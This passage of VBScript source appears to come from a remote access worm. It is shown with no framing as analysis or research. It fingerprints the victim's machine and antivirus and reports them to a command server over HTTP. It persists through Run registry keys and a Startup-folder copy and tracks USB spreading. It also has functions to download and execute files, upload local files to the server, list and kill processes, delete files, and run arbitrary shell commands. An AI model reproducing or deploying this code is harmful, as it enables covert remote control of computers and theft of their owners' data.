                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     filename = split(file.name,".")
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 filesystemobj.deletefile (file.path) 
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if  inf = "" then
    inf = hwid & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set os = root.execquery ("select * from win32_operatingsystem")
    for each osinfo in os
       inf = inf & osinfo.caption & spliter  
       exit for
    next
    inf = inf & "plus" & spliter
    inf = inf & security & spliter
    inf = inf & usbspreading
    information = inf  
else
    information = inf
end if
end function


sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub


function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
    if  disk.volumeserialnumber <> "" then
        hwid = disk.volumeserialnumber
        exit for
    end if
next
end function


function security 
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
    versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
  osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
    security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
      usbspreading = "true - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
   else
      usbspreading = "false - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

   end if
end If



upstart
set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then 
    shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
    wscript.quit 
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
 
if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
  .type = 1 
  .open
  .write objhttpdownload.responsebody
  .savetofile strsaveto
  .close
   end with
   set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub

sub download (fileurl,filedir)

if filedir = "" then 
   filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
     
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
    dim  objstreamdownload
 set  objstreamdownload = createobject("adodb.stream")
    with objstreamdownload 
   .type = 1 
   .open
   .write objhttpdownload.responsebody
   .savetofile strsaveto
   .close
 end with
    set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub


function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade 
     .type = 1 
     .open
  .loadfromfile fileurl
  buffer = .read
  .close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function


function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
     enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function

function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
 enumprocess = enumprocess & objitem.name & "|"
 enumprocess = enumprocess & objitem.processid & "|"
    enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
   readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
   readallfromany = oexec.stderr.readall
else 
   readallfromany = ""
end if

cmdshell = readallfromany
end function